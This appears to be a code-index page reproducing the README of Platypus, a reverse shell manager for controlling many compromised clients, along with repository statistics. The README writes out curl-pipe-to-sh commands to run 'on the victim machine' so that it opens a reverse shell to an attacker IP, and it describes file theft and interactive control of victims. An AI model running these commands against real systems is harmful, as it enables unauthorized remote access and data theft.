MCPcopy Index your code
hub / github.com/WangYihang/Platypus

github.com/WangYihang/Platypus @v1.5.0

Chat with this repo
repository ↗ · DeepWiki ↗ · release v1.5.0 ↗ · + Follow
409 symbols 1,173 edges 79 files 2 documented · 0%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

Platypus

Travis-CI GitHub stars GitHub license GitHub Release Downloads Sponsors

A modern multiple reverse shell sessions/clients manager via terminal written in go

Features

  • [x] Multiple service listening port
  • [x] Multiple client connections
  • [x] RESTful API
  • [x] Python SDK
  • [x] Reverse shell as a service (Pop a reverse shell in multiple languages without remembering idle commands)
  • [x] Download/Upload file with progress bar
  • [x] Full interactive shell
  • [x] Using vim gracefully in reverse shell
  • [x] Using CTRL+C and CTRL+Z in reverse shell
  • [x] Start servers automatically
  • [x] Port forwarding
  • [x] Initialize from configuration file
  • [x] Web UI

Get Start

There are multiple ways to run this tool, feel free to choose one of the following method.

Install requirements for running (Optional)

sudo apt install upx

Run Platypus from source code

git clone https://github.com/WangYihang/Platypus
cd Platypus
make

Run Platypus from docker-compose

docker-compose up -d
# Method 1: enter the cli of platypus
docker-compose exec app tmux a -t platypus
# Method 2: enter the web ui of platypus
firefox http://127.0.0.1:7331/

Run Platypus from release binaries

  1. Download Platypus prebuild binary from HERE
  2. Run the downloaded executable file

Usage

Network Topology

  • Attack IP: 192.168.88.129
  • Reverse Shell Service: 0.0.0.0:13337
  • Reverse Shell Service: 0.0.0.0:13338
  • RESTful Service: 127.0.0.1:7331
  • Victim IP: 192.168.88.130

Give it a try

First, run ./Platypus, then the config.yml will be generated automatically, and the config file is simple enough.

servers: 
  - host: "0.0.0.0"
    port: 13337
    # Platypus is able to use several properties as unique identifier (primirary key) of a single client.
    # All available properties are listed below:
    # `%i` IP
    # `%u` Username
    # `%m` MAC address
    # `%o` Operating System
    # `%t` Income TimeStamp
    hashFormat: "%i %u %m %o"
  - host: "0.0.0.0"
    port: 13338
    # Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC.
    hashFormat: "%i %u %m %o %t"
restful:
  host: "127.0.0.1"
  port: 7331
  enable: true
# Check new releases from GitHub when starting Platypus
update: false

As you can see, platypus will check for updates, then start listening on port 13337, 13338 and 7331

The three port have different aims. - 13337 Reverse shell server, which disallows the reverse session comes from the IP. - 13338 Reverse shell server, which allows the reverse session comes from the IP. - 7331 Platypus RESTful API EndPoint, which allows you to manipulate Platypus through HTTP protocol or Python SDK.

If you want another reverse shell listening port, just type Run 0.0.0.0 1339 or modify the config.yml.

Also, platypus will print help information about RaaS which release you from remembering tedious reverse shell commands.

With platypus, all you have to do is just copy-and-paste the curl command and execute it on the victim machine.

curl http://127.0.0.1:13337/|sh
curl http://192.168.88.129:13337/|sh

Now, suppose that the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim.

Notice, the RaaS feature ensure that the reverse shell process is running in background and ignore the hangup signal.

Get start with Web UI

Manage listening port

Wait for client connection

Popup an interactive shell

Upgrade a reverse shell to an encrypted channel (Termite)

Get start with cli

List all victims

You can use List command to print table style infomation about all listening servers and connected clients. Notice that the port 13337 will reset the connection from the same machine (we consider two connection are same iff they share the same Hash value, the info being hash can be configured in config.yml). Port 13338 will not reset such connections, which provide more repliability.

Select a victim

Jump command can take you a tour between clients. Use Jump [HASH / Alias] to jump. Alias is a alias of a specific client, you can set a alias of a client via Alias [ALIAS]. Also, for jumping through HASH, you do not need to type the whole hash, just prefix of hash will work.

All commands are case insensitive, feel free to use tab for completing.

Interactive shell

Interact will popup a shell, just like netcat.

Download file

Use Download command to download file from reverse shell client to attacker's machine.

Upload file

Use Upload command to upload file to the current interacting client.

Interactive shell mode

This feature only works on *nix clients

For your user experience, we highly RECOMMEND you use Upgrade command to upgrade the plain reverse shell to a encrypted interactive shell.

Try to Spawn /bin/bash via Python, then the shell is fully interactive (You can use vim / htop and other stuffs). First use Jump to select a client, then type PTY, then type Interact to drop into a fully interactive shell. ~~You can just simply type exit to exit pty mode~~, to avoid the situation in issue #39, you can use platyquit to quit the fully interactive shell mode.

Advanced Usages

  • Reverse shell as a Service (RaaS)
  • RESTful API
  • Python SDK

Other Materials

TODOs

Contributors

This project exists thanks to all the people who contribute.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

404StarLink 2.0 - Galaxy

Platypus has joined 404Team 404StarLink 2.0 - Galaxy

Extension points exported contracts — how you extend this code

TtydTerminal (Interface)
(no doc)
html/ttyd/src/components/terminal/index.tsx
Window (Interface)
(no doc)
html/ttyd/src/components/terminal/index.tsx
ClientOptions (Interface)
(no doc)
html/ttyd/src/components/terminal/index.tsx
Props (Interface)
(no doc)
html/ttyd/src/components/terminal/index.tsx
FlowControl (Interface)
(no doc)
html/ttyd/src/components/zmodem/index.tsx

Core symbols most depended-on inside this repo

Error
called by 157
lib/util/log/log.go
String
called by 88
lib/util/os/os.go
Info
called by 58
lib/util/log/log.go
Success
called by 53
lib/util/log/log.go
Debug
called by 43
lib/util/log/log.go
Close
called by 30
lib/context/client.go
Write
called by 26
lib/context/client.go
SystemToken
called by 26
lib/context/client.go

Shape

Method 224
Function 72
Struct 67
Class 33
Interface 8
TypeAlias 4
Enum 1

Languages

Go72%
TypeScript28%

Modules by API surface

lib/context/client.go47 symbols
lib/util/message/message.go44 symbols
html/ttyd/src/components/terminal/index.tsx28 symbols
lib/context/termite.go24 symbols
lib/context/server.go23 symbols
lib/context/context.go22 symbols
html/ttyd/src/components/zmodem/index.tsx20 symbols
html/frontend/src/App.js16 symbols
termite.go14 symbols
lib/util/log/log.go6 symbols
lib/util/fs/file.go6 symbols
lib/context/restful.go6 symbols

For agents

$ claude mcp add Platypus \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact

Ask about this repo answers extend the page